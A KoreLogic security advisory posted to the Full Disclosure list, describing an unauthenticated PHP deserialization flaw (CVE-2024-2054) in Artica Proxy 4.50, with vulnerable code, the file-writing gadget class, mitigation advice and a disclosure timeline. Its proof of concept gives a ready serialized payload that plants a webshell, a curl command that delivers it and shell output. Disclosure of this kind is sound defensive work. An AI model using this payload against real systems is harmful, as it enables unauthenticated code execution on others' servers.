KL-001-2024-002: Artica Proxy Unauthenticated PHP Deserialization Vulnerability Title: Artica Proxy Unauthenticated PHP Deserialization Vulnerability Advisory ID: KL-001-2024-002 Publication Date: 2024.03.05 Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-002.txt 1. Vulnerability Details Affected Vendor: Artica Affected Product: Artica Proxy Affected Version: 4.50 Platform: Debian 10 LTS CWE Classification: CWE-502 Deserialization of Untrusted Data CVE ID: CVE-2024-2054 2. Vulnerability Description The Artica Proxy administrative web application will deserialize arbitrary PHP objects supplied by unauthenticated users and subsequently enable code execution as the "www-data" user. 3. Technical Description Prior to authentication, a user can send an HTTP request to the "/wizard/wiz.wizard.progress.php" endpoint. This endpoint processes the "build-js" query parameter by base64 decoding the provided value and then calling the "unserialize" PHP function with the decoded value as input. Code snippet from "wiz.wizard.progress.php": if(isset($_GET["build-js"])){buildjs();exit;} ... $ARRAY=unserialize(base64_decode($_GET["build-js"])); To exploit this vulnerability, a user can leverage the installed "Net_DNS2" library autoloader to instantiate the "Net_DNS2_Cache_File" class. The "__destruct" method within this class will write to arbitrary files defined by the class: public function __destruct() { // // if there's no cache file set, then there's nothing to do // if (strlen($this->cache_file) == 0) { return; } // // open the file for reading/writing // $fp = fopen($this->cache_file, 'a+'); if ($fp !== false) { ... if (!is_null($data)) { // // write the file contents // fwrite($fp, $data); } An unauthenticated user can overwrite existing files and insert a webshell to execute malicious PHP as the "www-data" user. 4. Mitigation and Remediation Recommendation No response from vendor. This vulnerability can be remediated by deleting the 'usr/share/artica-postfix/wizard' directory if it is not needed. Otherwise, move it to a location outside of the web root. 5. Credit This vulnerability was discovered by Jaggar Henry of KoreLogic, Inc. 6. Disclosure Timeline 2023.12.18 - KoreLogic requests vulnerability contact and secure communication method from Artica. 2023.12.18 - Artica Support issues automated ticket #1703011342 promising follow-up from a human. 2024.01.10 - KoreLogic again requests vulnerability contact and secure communication method from Artica. 2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from mail.articatech.com with response "Client host rejected: Go Away!" 2024.01.11 - KoreLogic requests vulnerability contact and secure communication method via https://www.articatech.com/ 'Contact Us' web form. 2024.01.23 - KoreLogic requests CVE from MITRE. 2024.01.23 - MITRE issues automated ticket #1591692 promising follow-up from a human. 2024.02.01 - 30 business days have elapsed since KoreLogic attempted to contact the vendor. 2024.02.06 - KoreLogic requests update on CVE from MITRE. 2024.02.15 - KoreLogic requests update on CVE from MITRE. 2024.02.22 - KoreLogic reaches out to alternate CNA for CVE identifiers. 2024.02.26 - 45 business days have elapsed since KoreLogic attempted to contact the vendor. 2024.02.29 - Vulnerability details presented to AHA! (takeonme.org) by proxy. 2024.03.01 - AHA! issues CVE-2024-2054 to track this vulnerability. 2024.03.05 - KoreLogic public disclosure. 7. Proof of Concept To overwrite the "wiz.upload.php" file to contain a PHP webshell, the following serialized object can be base64 encoded and submitted via the "build-js" query parameter:O:19:"Net_DNS2_Cache_File":4:{s:10:"cache_file";s:47:"/usr/share/artica-postfix/wizard/wiz.upload.php";s:16:"cache_serializer";s:4:"json";s:10:"cache_size";i:9999999999;s:10:"cache_data";a:1:{s:30:"<?php system($_GET['cmd']); ?>";a:2:{s:10:"cache_date";i:0;s:3:"ttl";i:9999999999;}}}
$ ARTICA_URL="https://127.0.0.1:9000";; PAYLOAD_CMD="id"; curl -k "$ARTICA_URL/wizard/wiz.wizard.progress.php?build-js=TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI6NDp7czoxMDoiY2FjaGVfZmlsZSI7czo0NzoiL3Vzci9zaGFyZS9hcnRpY2EtcG9zdGZpeC93aXphcmQvd2l6LnVwbG9hZC5waHAiO3M6MTY6ImNhY2hlX3NlcmlhbGl6ZXIiO3M6NDoianNvbiI7czoxMDoiY2FjaGVfc2l6ZSI7aTo5OTk5OTk5OTk5O3M6MTA6ImNhY2hlX2RhdGEiO2E6MTp7czozMDoiPD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8%2bIjthOjI6e3M6MTA6ImNhY2hlX2RhdGUiO2k6MDtzOjM6InR0bCI7aTo5OTk5OTk5OTk5O319fQ%3d%3d" && curl -k "$ARTICA_URL/wizard/wiz.upload.php?cmd=$PAYLOAD_CMD";
{"uid=33(www-data) gid=33(www-data) groups=33(www-data) ":{"cache_date":1696883506,"ttl":8303116493}} The contents of this advisory are copyright(c) 2024 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt
Attachment:
OpenPGP_signature.asc
Description: OpenPGP digital signature
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/